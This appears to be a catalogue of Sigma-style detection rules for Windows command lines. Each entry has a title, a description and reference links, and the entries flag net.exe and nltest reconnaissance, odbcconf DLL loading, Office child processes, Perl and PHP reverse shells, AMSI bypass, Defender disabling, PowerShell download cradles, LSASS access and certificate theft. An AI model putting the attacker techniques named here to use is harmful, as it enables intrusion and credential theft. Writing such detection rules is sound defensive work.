Suspicious Manipulation Of Default Accounts Via Net.EXE Detects suspicious manipulations of default accounts such as 'administrator' and 'guest'. For example 'enable' or 'disable' accounts or change the password...etc https://www.trellix.com/en-sg/about/newsroom/stories/threat-labs/lockergoga-ransomware-family-used-in-targeted-attacks.html, https://redacted.com/blog/bianlian-ransomware-gang-gives-it-a-go/, https://www.microsoft.com/security/blog/2022/09/07/profiling-dev-0270-phosphorus-ransomware-operations/
Windows Admin Share Mount Via Net.EXE Detects when an admin share is mounted using net.exe https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view
Stop Windows Service Via Net.EXE Detects the stopping of a Windows service via the "net" utility. https://ss64.com/nt/net-service.html
Password Provided In Command Line Of Net.EXE Detects a when net.exe is called with a password in the command line Internal Research
Windows Internet Hosted WebDav Share Mount Via Net.EXE Detects when an internet hosted webdav share is mounted using the "net.exe" utility https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view
Windows Share Mount Via Net.EXE Detects when a share is mounted using the "net.exe" utility https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view
System Network Connections Discovery Via Net.EXE Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1049/T1049.md#atomic-test-1---system-network-connections-discovery
Share And Session Enumeration Using Net.EXE Detects attempts to enumerate file shares, printer shares and sessions using "net.exe" with the "view" flag. https://eqllib.readthedocs.io/en/latest/analytics/b8a94d2f-dc75-4630-9d73-1edc6bd26fff.html, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md
Nltest.EXE Execution Detects nltest commands that can be used for information discovery https://jpcertcc.github.io/ToolAnalysisResultSheet/details/nltest.htm
Potential Arbitrary Code Execution Via Node.EXE Detects the execution node.exe which is shipped with multiple software such as VMware, Adobe...etc. In order to execute arbitrary code. For example to establish reverse shell as seen in Log4j attacks...etc http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html, https://www.sprocketsecurity.com/resources/crossing-the-log4j-horizon-a-vulnerability-with-no-return, https://www.rapid7.com/blog/post/2022/01/18/active-exploitation-of-vmware-horizon-servers/, https://nodejs.org/api/cli.html
Potential Recon Activity Via Nltest.EXE Detects nltest commands that can be used for information discovery https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731935(v=ws.11), https://thedfirreport.com/2021/08/16/trickbot-leads-up-to-fake-1password-installation/, https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/, https://book.hacktricks.xyz/windows/basic-cmd-for-pentesters, https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack/, https://eqllib.readthedocs.io/en/latest/analytics/03e231a6-74bc-467a-acb1-e5676b0fb55e.html, https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/, https://github.com/redcanaryco/atomic-red-team/blob/5360c9d9ffa3b25f6495f7a16e267b719eba2c37/atomics/T1482/T1482.md#atomic-test-2---windows---discover-domain-trusts-with-nltest
Node Process Executions Detects the execution of other scripts using the Node executable packaged with Adobe Creative Cloud https://twitter.com/mttaggart/status/1511804863293784064
Network Reconnaissance Activity Detects a set of suspicious network related commands often used in recon stages https://thedfirreport.com/2022/02/07/qbot-likes-to-move-it-move-it/
Nslookup PowerShell Download Cradle - ProcessCreation Detects suspicious powershell download cradle using nslookup. This cradle uses nslookup to extract payloads from DNS records https://twitter.com/Alh4zr3d/status/1566489367232651264
Suspicious Usage Of Active Directory Diagnostic Tool (ntdsutil.exe) Detects execution of ntdsutil.exe to perform different actions such as restoring snapshots...etc. https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731620(v=ws.11), https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/espionage-asia-governments
Invocation of Active Directory Diagnostic Tool (ntdsutil.exe) Detects execution of ntdsutil.exe, which can be used for various attacks against the NTDS database (NTDS.DIT) https://jpcertcc.github.io/ToolAnalysisResultSheet/details/ntdsutil.htm
Driver/DLL Installation Via Odbcconf.EXE Detects execution of "odbcconf" with "INSTALLDRIVER" which installs a new ODBC driver. Attackers abuse this to install and run malicious DLLs. https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/, https://web.archive.org/web/20191023232753/https://twitter.com/Hexacorn/status/1187143326673330176, https://www.hexacorn.com/blog/2020/08/23/odbcconf-lolbin-trifecta/
Suspicious Driver/DLL Installation Via Odbcconf.EXE Detects execution of "odbcconf" with the "INSTALLDRIVER" action where the driver doesn't contain a ".dll" extension. This is often used as a defense evasion method. https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/, https://web.archive.org/web/20191023232753/https://twitter.com/Hexacorn/status/1187143326673330176, https://www.hexacorn.com/blog/2020/08/23/odbcconf-lolbin-trifecta/
New DLL Registered Via Odbcconf.EXE Detects execution of "odbcconf" with "REGSVR" in order to register a new DLL (equivalent to running regsvr32). Attackers abuse this to install and run malicious DLLs. https://learn.microsoft.com/en-us/sql/odbc/odbcconf-exe?view=sql-server-ver16, https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/, https://redcanary.com/blog/raspberry-robin/, https://web.archive.org/web/20191023232753/https://twitter.com/Hexacorn/status/1187143326673330176, https://www.hexacorn.com/blog/2020/08/23/odbcconf-lolbin-trifecta/, https://www.trendmicro.com/en_us/research/17/h/backdoor-carrying-emails-set-sights-on-russian-speaking-businesses.html
Odbcconf.EXE Suspicious DLL Location Detects execution of "odbcconf" where the path of the DLL being registered is located in a potentially suspicious location. https://learn.microsoft.com/en-us/sql/odbc/odbcconf-exe?view=sql-server-ver16, https://www.trendmicro.com/en_us/research/17/h/backdoor-carrying-emails-set-sights-on-russian-speaking-businesses.html, https://securityintelligence.com/posts/raspberry-robin-worm-dridex-malware/
Potentially Suspicious DLL Registered Via Odbcconf.EXE Detects execution of "odbcconf" with the "REGSVR" action where the DLL in question doesn't contain a ".dll" extension. Which is often used as a method to evade defenses. https://learn.microsoft.com/en-us/sql/odbc/odbcconf-exe?view=sql-server-ver16, https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/, https://www.trendmicro.com/en_us/research/17/h/backdoor-carrying-emails-set-sights-on-russian-speaking-businesses.html
Response File Execution Via Odbcconf.EXE Detects execution of "odbcconf" with the "-f" flag in order to load a response file which might contain a malicious action. https://learn.microsoft.com/en-us/sql/odbc/odbcconf-exe?view=sql-server-ver16, https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/, https://www.cybereason.com/blog/threat-analysis-report-bumblebee-loader-the-high-road-to-enterprise-domain-control, https://www.hexacorn.com/blog/2020/08/23/odbcconf-lolbin-trifecta/
Suspicious Response File Execution Via Odbcconf.EXE Detects execution of "odbcconf" with the "-f" flag in order to load a response file with a non-".rsp" extension. https://learn.microsoft.com/en-us/sql/odbc/odbcconf-exe?view=sql-server-ver16, https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/, https://www.trendmicro.com/en_us/research/17/h/backdoor-carrying-emails-set-sights-on-russian-speaking-businesses.html
Uncommon Child Process Spawned By Odbcconf.EXE Detects an uncommon child process of "odbcconf.exe" binary which normally shouldn't have any child processes. https://learn.microsoft.com/en-us/sql/odbc/odbcconf-exe?view=sql-server-ver16, https://lolbas-project.github.io/lolbas/Binaries/Odbcconf/, https://medium.com/@cyberjyot/t1218-008-dll-execution-using-odbcconf-exe-803fa9e08dac
Potential Arbitrary File Download Using Office Application Detects potential arbitrary file download using a Microsoft Office application https://lolbas-project.github.io/lolbas/OtherMSBinaries/Winword/, https://lolbas-project.github.io/lolbas/OtherMSBinaries/Powerpnt/, https://lolbas-project.github.io/lolbas/OtherMSBinaries/Excel/, https://medium.com/@reegun/unsanitized-file-validation-leads-to-malicious-payload-download-via-office-binaries-202d02db7191
Potential Excel.EXE DCOM Lateral Movement Via ActivateMicrosoftApp Detects suspicious child processes of Excel which could be an indicator of lateral movement leveraging the "ActivateMicrosoftApp" Excel DCOM object. https://posts.specterops.io/lateral-movement-abuse-the-power-of-dcom-excel-application-3c016d0d9922, https://github.com/grayhatkiller/SharpExShell, https://learn.microsoft.com/en-us/office/vba/api/excel.xlmsapplication
Potentially Suspicious Office Document Executed From Trusted Location Detects the execution of an Office application that points to a document that is located in a trusted location. Attackers often used this to avoid macro security and execute their malicious code. Internal Research, https://twitter.com/Max_Mal_/status/1633863678909874176, https://techcommunity.microsoft.com/t5/microsoft-365-blog/new-security-hardening-policies-for-trusted-documents/ba-p/3023465, https://twitter.com/_JohnHammond/status/1588155401752788994
OneNote.EXE Execution of Malicious Embedded Scripts Detects the execution of malicious OneNote documents that contain embedded scripts. When a user clicks on a OneNote attachment and then on the malicious link inside the ".one" file, it exports and executes the malicious embedded script from specific directories. https://bazaar.abuse.ch/browse/tag/one/
Suspicious Microsoft OneNote Child Process Detects suspicious child processes of the Microsoft OneNote application. This may indicate an attempt to execute malicious embedded objects from a .one file. https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-e34e43eb5666427602ddf488b2bf3b545bd9aae81af3e6f6c7949f9652abdf18, https://micahbabinski.medium.com/detecting-onenote-one-malware-delivery-407e9321ecf0
Outlook EnableUnsafeClientMailRules Setting Enabled Detects an attacker trying to enable the outlook security setting "EnableUnsafeClientMailRules" which allows outlook to run applications or execute macros https://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html, https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=44, https://support.microsoft.com/en-us/topic/how-to-control-the-rule-actions-to-start-an-application-or-run-a-macro-in-outlook-2016-and-outlook-2013-e4964b72-173c-959d-5d7b-ead562979048
Suspicious Execution From Outlook Temporary Folder Detects a suspicious program execution in Outlook temp folder Internal Research
Suspicious Outlook Child Process Detects a suspicious process spawning from an Outlook process. https://www.hybrid-analysis.com/sample/465aabe132ccb949e75b8ab9c5bda36d80cf2fd503d52b8bad54e295f28bbc21?environmentId=100, https://mgreen27.github.io/posts/2018/04/02/DownloadCradle.html
Suspicious Remote Child Process From Outlook Detects a suspicious child process spawning from Outlook where the image is located in a remote location (SMB/WebDav shares). https://github.com/sensepost/ruler, https://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html, https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=49
Suspicious Binary In User Directory Spawned From Office Application Detects an executable in the users directory started from one of the Microsoft Office suite applications (Word, Excel, PowerPoint, Publisher, Visio) https://blog.morphisec.com/fin7-not-finished-morphisec-spots-new-campaign, https://www.virustotal.com/gui/file/23160972c6ae07f740800fa28e421a81d7c0ca5d5cab95bc082b4a986fbac57
Potential Arbitrary DLL Load Using Winword Detects potential DLL sideloading using the Microsoft Office winword process via the '/l' flag. https://github.com/D4Vinci/One-Lin3r/blob/9fdfa5f0b9c698dfbd4cdfe7d2473192777ae1c6/one_lin3r/core/liners/windows/cmd/dll_loader_word.py
Suspicious Microsoft Office Child Process Detects a suspicious process spawning from one of the Microsoft Office suite products (Word, Excel, PowerPoint, Publisher, Visio, etc.) https://www.hybrid-analysis.com/sample/465aabe132ccb949e75b8ab9c5bda36d80cf2fd503d52b8bad54e295f28bbc21?environmentId=100, https://mgreen27.github.io/posts/2018/04/02/DownloadCradle.html, https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/, https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e, https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml, https://github.com/splunk/security_content/blob/develop/detections/endpoint/office_spawning_control.yml, https://twitter.com/andythevariable/status/1576953781581144064?s=20&t=QiJILvK4ZiBdR8RJe24u-A, https://www.elastic.co/security-labs/exploring-the-ref2731-intrusion-set, https://github.com/elastic/detection-rules/blob/c76a39796972ecde44cb1da6df47f1b6562c9770/rules/windows/defense_evasion_execution_msbuild_started_by_office_app.toml, https://www.vmray.com/analyses/2d2fa29185ad/report/overview.html, https://app.any.run/tasks/c903e9c8-0350-440c-8688-3881b556b8e0/
Potential Mpclient.DLL Sideloading Via OfflineScannerShell.EXE Execution Detects execution of Windows Defender "OfflineScannerShell.exe" from its non standard directory. The "OfflineScannerShell.exe" binary is vulnerable to DLL side loading and will load any DLL named "mpclient.dll" from the current working directory. https://lolbas-project.github.io/lolbas/Binaries/OfflineScannerShell/
PDQ Deploy Remote Adminstartion Tool Execution Detect use of PDQ Deploy remote admin tool https://github.com/redcanaryco/atomic-red-team/blob/9e5b12c4912c07562aec7500447b11fa3e17e254/atomics/T1072/T1072.md, https://www.pdq.com/pdq-deploy/
Potentially Suspicious Execution Of PDQDeployRunner Detects suspicious execution of "PDQDeployRunner" which is part of the PDQDeploy service stack that is responsible for executing commands and packages on a remote machines https://twitter.com/malmoeb/status/1550483085472432128
Perl Inline Command Execution Detects execution of perl using the "-e"/"-E" flags. This is could be used as a way to launch a reverse shell or execute live perl code. https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet, https://www.revshells.com/
Php Inline Command Execution Detects execution of php using the "-r" flag. This is could be used as a way to launch a reverse shell or execute live php code. https://www.php.net/manual/en/features.commandline.php, https://www.revshells.com/, https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
Ping Hex IP Detects a ping command that uses a hex encoded IP address https://github.com/vysecurity/Aggressor-VYSEC/blob/0d61c80387b9432dab64b8b8a9fb52d20cfef80e/ping.cna, https://twitter.com/vysecurity/status/977198418354491392
PktMon.EXE Execution Detects execution of PktMon, a tool that captures network packets. https://lolbas-project.github.io/lolbas/Binaries/Pktmon/
Suspicious Plink Port Forwarding Detects suspicious Plink tunnel port forwarding to a local port https://www.real-sec.com/2019/04/bypassing-network-restrictions-through-rdp-tunneling/, https://medium.com/@informationsecurity/remote-ssh-tunneling-with-plink-exe-7831072b3d7d
Potential RDP Tunneling Via Plink Execution of plink to perform data exfiltration and tunneling https://www.microsoft.com/security/blog/2022/07/26/malicious-iis-extensions-quietly-open-persistent-backdoors-into-servers/
Suspicious Powercfg Execution To Change Lock Screen Timeout Detects suspicious execution of 'Powercfg.exe' to change lock screen timeout https://blogs.vmware.com/security/2022/11/batloader-the-evasive-downloader-malware.html, https://learn.microsoft.com/en-us/windows-hardware/design/device-experiences/powercfg-command-line-options
AADInternals PowerShell Cmdlets Execution - ProccessCreation Detects ADDInternals Cmdlet execution. A tool for administering Azure AD and Office 365. Which can be abused by threat actors to attack Azure AD or Office 365. https://o365blog.com/aadinternals/, https://github.com/Gerenios/AADInternals
Potential Active Directory Enumeration Using AD Module - ProcCreation Detects usage of the "Import-Module" cmdlet to load the "Microsoft.ActiveDirectory.Management.dl" DLL. Which is often used by attackers to perform AD enumeration. https://github.com/samratashok/ADModule, https://twitter.com/cyb3rops/status/1617108657166061568?s=20, https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/active-directory-enumeration-with-ad-module-without-rsat-or-admin-privileges
Add Windows Capability Via PowerShell Cmdlet Detects usage of the "Add-WindowsCapability" cmdlet to add Windows capabilities. Notable capabilities could be "OpenSSH" and others. https://learn.microsoft.com/en-us/windows-server/administration/openssh/openssh_install_firstuse?tabs=powershell, https://www.virustotal.com/gui/file/af1c82237b6e5a3a7cdbad82cc498d298c67845d92971bada450023d1335e267/content
Potential AMSI Bypass Via .NET Reflection Detects Request to "amsiInitFailed" that can be used to disable AMSI Scanning https://s3cur3th1ssh1t.github.io/Bypass_AMSI_by_manual_modification/, https://www.mdsec.co.uk/2018/06/exploring-powershell-amsi-and-logging-evasion/
Potential AMSI Bypass Using NULL Bits Detects usage of special strings/null bits in order to potentially bypass AMSI functionalities https://github.com/r00t-3xp10it/hacking-material-books/blob/43cb1e1932c16ff1f58b755bc9ab6b096046853f/obfuscation/simple_obfuscation.md#amsi-bypass-using-null-bits-satoshi
Audio Capture via PowerShell Detects audio capture via PowerShell Cmdlet. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1123/T1123.md, https://eqllib.readthedocs.io/en/latest/analytics/ab7a6ef4-0983-4275-a4f1-5c6bd3c31c23.html, https://github.com/frgnca/AudioDeviceCmdlets
Suspicious Encoded PowerShell Command Line Detects suspicious powershell process starts with base64 encoded commands (e.g. Emotet) https://app.any.run/tasks/6217d77d-3189-4db2-a957-8ab239f3e01e
Suspicious PowerShell Encoded Command Patterns Detects PowerShell command line patterns in combincation with encoded commands that often appear in malware infection chains https://app.any.run/tasks/b9040c63-c140-479b-ad59-f1bb56ce7a97/
Suspicious Obfuscated PowerShell Code Detects suspicious UTF16 and base64 encoded and often obfuscated PowerShell code often used in command lines https://app.any.run/tasks/fcadca91-3580-4ede-aff4-4d2bf809bf99/
PowerShell Base64 Encoded FromBase64String Cmdlet Detects usage of a base64 encoded "FromBase64String" cmdlet in a process command line Internal Research
Malicious Base64 Encoded PowerShell Keywords in Command Lines Detects base64 encoded strings used in hidden malicious PowerShell command lines http://www.leeholmes.com/blog/2017/09/21/searching-for-content-in-base-64-strings/
PowerShell Base64 Encoded IEX Cmdlet Detects usage of a base64 encoded "IEX" cmdlet in a process command line Internal Research
PowerShell Base64 Encoded Invoke Keyword Detects UTF-8 and UTF-16 Base64 encoded powershell 'Invoke-' calls https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/
Powershell Base64 Encoded MpPreference Cmdlet Detects base64 encoded "MpPreference" PowerShell cmdlet code that tries to modifies or tamper with Windows Defender AV https://learn.microsoft.com/en-us/defender-endpoint/configure-process-opened-file-exclusions-microsoft-defender-antivirus, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md, https://twitter.com/AdamTheAnalyst/status/1483497517119590403
PowerShell Base64 Encoded Reflective Assembly Load Detects base64 encoded .NET reflective loading of Assembly https://github.com/Neo23x0/Raccine/blob/20a569fa21625086433dcce8bb2765d0ea08dcb6/yara/mal_revil.yar, https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/
Suspicious Encoded And Obfuscated Reflection Assembly Load Function Call Detects suspicious base64 encoded and obfuscated "LOAD" keyword used in .NET "reflection.assembly" https://github.com/Neo23x0/Raccine/blob/20a569fa21625086433dcce8bb2765d0ea08dcb6/yara/mal_revil.yar, https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/, https://learn.microsoft.com/en-us/dotnet/api/system.appdomain.load?view=net-7.0
Potential Process Execution Proxy Via CL_Invocation.ps1 Detects calls to "SyncInvoke" that is part of the "CL_Invocation.ps1" script to proxy execution using "System.Diagnostics.Process" https://lolbas-project.github.io/lolbas/Scripts/Cl_invocation/, https://twitter.com/bohops/status/948061991012327424
PowerShell Base64 Encoded WMI Classes Detects calls to base64 encoded WMI class such as "Win32_ShadowCopy", "Win32_ScheduledJob", etc. https://github.com/Neo23x0/Raccine/blob/20a569fa21625086433dcce8bb2765d0ea08dcb6/yara/mal_revil.yar
Assembly Loading Via CL_LoadAssembly.ps1 Detects calls to "LoadAssemblyFromPath" or "LoadAssemblyFromNS" that are part of the "CL_LoadAssembly.ps1" script. This can be abused to load different assemblies and bypass App locker controls. https://bohops.com/2018/01/07/executing-commands-and-bypassing-applocker-with-powershell-diagnostic-scripts/, https://lolbas-project.github.io/lolbas/Scripts/CL_LoadAssembly/
Potential Script Proxy Execution Via CL_Mutexverifiers.ps1 Detects the use of the Microsoft signed script "CL_mutexverifiers" to proxy the execution of additional PowerShell script commands https://lolbas-project.github.io/lolbas/Scripts/CL_mutexverifiers/
Potential PowerShell Obfuscation Via Reversed Commands Detects the presence of reversed PowerShell commands in the CommandLine. This is often used as a method of obfuscation by attackers https://2019.offzone.moscow/ru/report/hunting-for-powershell-abuses/, https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=66
ConvertTo-SecureString Cmdlet Usage Via CommandLine Detects usage of the "ConvertTo-SecureString" cmdlet via the commandline. Which is fairly uncommon and could indicate potential suspicious activity https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=65, https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.security/convertto-securestring?view=powershell-7.3#examples
Potential PowerShell Command Line Obfuscation Detects the PowerShell command lines with special characters https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=64
Computer Discovery And Export Via Get-ADComputer Cmdlet Detects usage of the Get-ADComputer cmdlet to collect computer information and output it to a file http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html, https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/, https://www.cisa.gov/uscert/sites/default/files/publications/aa22-320a_joint_csa_iranian_government-sponsored_apt_actors_compromise_federal%20network_deploy_crypto%20miner_credential_harvester.pdf
New Service Creation Using PowerShell Detects the creation of a new service using powershell. https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.003/T1543.003.md
Gzip Archive Decode Via PowerShell Detects attempts of decoding encoded Gzip archives via PowerShell. https://www.zscaler.com/blogs/security-research/onenote-growing-threat-malware-distribution
PowerShell Execution With Potential Decryption Capabilities Detects PowerShell commands that decrypt an ".LNK" "file to drop the next stage of the malware. https://research.checkpoint.com/2023/chinese-threat-actors-targeting-europe-in-smugx-campaign/
Powershell Defender Disable Scan Feature Detects requests to disable Microsoft Defender features using PowerShell commands https://learn.microsoft.com/en-us/powershell/module/defender/set-mppreference?view=windowsserver2022-ps, https://www.virustotal.com/gui/file/d609799091731d83d75ec5d1f030571af20c45efeeb94840b67ea09a3283ab65/behavior/C2AE, https://www.virustotal.com/gui/search/content%253A%2522Set-MpPreference%2520-Disable%2522/files
Powershell Defender Exclusion Detects requests to exclude files, folders or processes from Antivirus scanning using PowerShell cmdlets https://learn.microsoft.com/en-us/defender-endpoint/configure-process-opened-file-exclusions-microsoft-defender-antivirus, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md, https://twitter.com/AdamTheAnalyst/status/1483497517119590403
Disable Windows Defender AV Security Monitoring Detects attackers attempting to disable Windows Defender using Powershell https://research.nccgroup.com/2020/06/23/wastedlocker-a-new-ransomware-variant-developed-by-the-evil-corp-group/, https://rvsec0n.wordpress.com/2020/01/24/malwares-that-bypass-windows-defender/, https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md
Windows Firewall Disabled via PowerShell Detects attempts to disable the Windows Firewall using PowerShell https://www.elastic.co/guide/en/security/current/windows-firewall-disabled-via-powershell.html
Potential PowerShell Downgrade Attack Detects PowerShell downgrade attack by comparing the host versions with the actually used engine version 2.0 http://www.leeholmes.com/blog/2017/03/17/detecting-and-preventing-powershell-downgrade-attacks/, https://github.com/r00t-3xp10it/hacking-material-books/blob/43cb1e1932c16ff1f58b755bc9ab6b096046853f/obfuscation/simple_obfuscation.md#bypass-or-avoid-amsi-by-version-downgrade-
Disabled IE Security Features Detects command lines that indicate unwanted modifications to registry keys that disable important Internet Explorer security features https://unit42.paloaltonetworks.com/operation-ke3chang-resurfaces-with-new-tidepool-malware/
Potential COM Objects Download Cradles Usage - Process Creation Detects usage of COM objects that can be abused to download files in PowerShell by CLSID https://learn.microsoft.com/en-us/dotnet/api/system.type.gettypefromclsid?view=net-7.0, https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=57
PowerShell Web Download Detects suspicious ways to download files or content using PowerShell https://github.com/VirtualAlllocEx/Payload-Download-Cradles/blob/88e8eca34464a547c90d9140d70e9866dcbc6a12/Download-Cradles.cmd
Obfuscated PowerShell OneLiner Execution Detects the execution of a specific OneLiner to download and execute powershell modules in memory. https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/, https://gist.github.com/mgeeky/3b11169ab77a7de354f4111aa2f0df38
Potential DLL File Download Via PowerShell Invoke-WebRequest Detects potential DLL files being downloaded using the PowerShell Invoke-WebRequest cmdlet https://www.zscaler.com/blogs/security-research/onenote-growing-threat-malware-distribution
PowerShell Download and Execution Cradles Detects PowerShell download and execution cradles. https://github.com/VirtualAlllocEx/Payload-Download-Cradles/blob/88e8eca34464a547c90d9140d70e9866dcbc6a12/Download-Cradles.cmd, https://labs.withsecure.com/publications/fin7-target-veeam-servers
PowerShell Download Pattern Detects a Powershell process that contains download commands in its command line string https://blog.redteam.pl/2020/06/black-kingdom-ransomware.html, https://lab52.io/blog/winter-vivern-all-summer/, https://hatching.io/blog/powershell-analysis/
Potentially Suspicious File Download From File Sharing Domain Via PowerShell.EXE Detects potentially suspicious file downloads from file sharing domains using PowerShell.exe https://labs.withsecure.com/publications/fin7-target-veeam-servers, https://github.com/WithSecureLabs/iocs/blob/344203de742bb7e68bd56618f66d34be95a9f9fc/FIN7VEEAM/iocs.csv, https://www.microsoft.com/en-us/security/blog/2024/01/17/new-ttps-observed-in-mint-sandstorm-campaign-targeting-high-profile-individuals-at-universities-and-research-orgs/, https://www.huntress.com/blog/slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708
DSInternals Suspicious PowerShell Cmdlets Detects execution and usage of the DSInternals PowerShell module. Which can be used to perform what might be considered as suspicious activity such as dumping DPAPI backup keys or manipulating NTDS.DIT files. The DSInternals PowerShell Module exposes several internal features of Active Directory and Azure Active Directory. These include FIDO2 and NGC key auditing, offline ntds.dit file manipulation, password auditing, DC recovery from IFM backups and password hash calculation. https://github.com/MichaelGrafnetter/DSInternals/blob/39ee8a69bbdc1cfd12c9afdd7513b4788c4895d4/Src/DSInternals.PowerShell/DSInternals.psd1
Email Exifiltration Via Powershell Detects email exfiltration via powershell cmdlets https://www.microsoft.com/security/blog/2022/09/07/profiling-dev-0270-phosphorus-ransomware-operations/, https://github.com/Azure/Azure-Sentinel/blob/7e6aa438e254d468feec061618a7877aa528ee9f/Hunting%20Queries/Microsoft%20365%20Defender/Ransomware/DEV-0270/Email%20data%20exfiltration%20via%20PowerShell.yaml
Potential Suspicious Windows Feature Enabled - ProcCreation Detects usage of the built-in PowerShell cmdlet "Enable-WindowsOptionalFeature" used as a Deployment Image Servicing and Management tool. Similar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images https://learn.microsoft.com/en-us/powershell/module/dism/enable-windowsoptionalfeature?view=windowsserver2022-ps, https://learn.microsoft.com/en-us/windows/win32/projfs/enabling-windows-projected-file-system, https://learn.microsoft.com/en-us/windows/wsl/install-on-server
Suspicious Execution of Powershell with Base64 Commandline to launch powershell with a base64 payload https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.001/T1059.001.md#atomic-test-20---powershell-invoke-known-malicious-cmdlets, https://unit42.paloaltonetworks.com/unit42-pulling-back-the-curtains-on-encodedcommand-powershell-attacks/, https://mikefrobbins.com/2017/06/15/simple-obfuscation-with-powershell-using-base64-encoding/
Potential Encoded PowerShell Patterns In CommandLine Detects specific combinations of encoding methods in PowerShell via the commandline https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=65
Powershell Inline Execution From A File Detects inline execution of PowerShell code from a file https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=50
Certificate Exported Via PowerShell Detects calls to cmdlets that are used to export certificates from the local certificate store. Threat actors were seen abusing this to steal private keys from compromised machines. https://us-cert.cisa.gov/ncas/analysis-reports/ar21-112a, https://learn.microsoft.com/en-us/powershell/module/pki/export-pfxcertificate?view=windowsserver2022-ps, https://www.splunk.com/en_us/blog/security/breaking-the-chain-defending-against-certificate-services-abuse.html
Base64 Encoded PowerShell Command Detected Detects usage of the "FromBase64String" function in the commandline which is used to decode a base64 encoded string https://gist.github.com/Neo23x0/6af876ee72b51676c82a2db8d2cd3639
Suspicious FromBase64String Usage On Gzip Archive - Process Creation Detects attempts of decoding a base64 Gzip archive via PowerShell. This technique is often used as a method to load malicious content into memory afterward. https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=43
PowerShell Get-Process LSASS Detects a "Get-Process" cmdlet and it's aliases on lsass process, which is in almost all cases a sign of malicious activity https://web.archive.org/web/20220205033028/https://twitter.com/PythonResponder/status/1385064506049630211
Suspicious Reconnaissance Activity Using Get-LocalGroupMember Cmdlet Detects suspicious reconnaissance command line activity on Windows systems using the PowerShell Get-LocalGroupMember Cmdlet https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/
PowerShell Get-Clipboard Cmdlet Via CLI Detects usage of the 'Get-Clipboard' cmdlet via CLI https://github.com/OTRF/detection-hackathon-apt29/issues/16, https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/3.B.2_C36B49B5-DF58-4A34-9FE9-56189B9DEFEA.md
Abuse of Service Permissions to Hide Services Via Set-Service Detects usage of the "Set-Service" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as "sc.exe", "Get-Service"...etc. (Works only in powershell 7) https://twitter.com/Alh4zr3d/status/1580925761996828672, https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/set-service?view=powershell-7.2
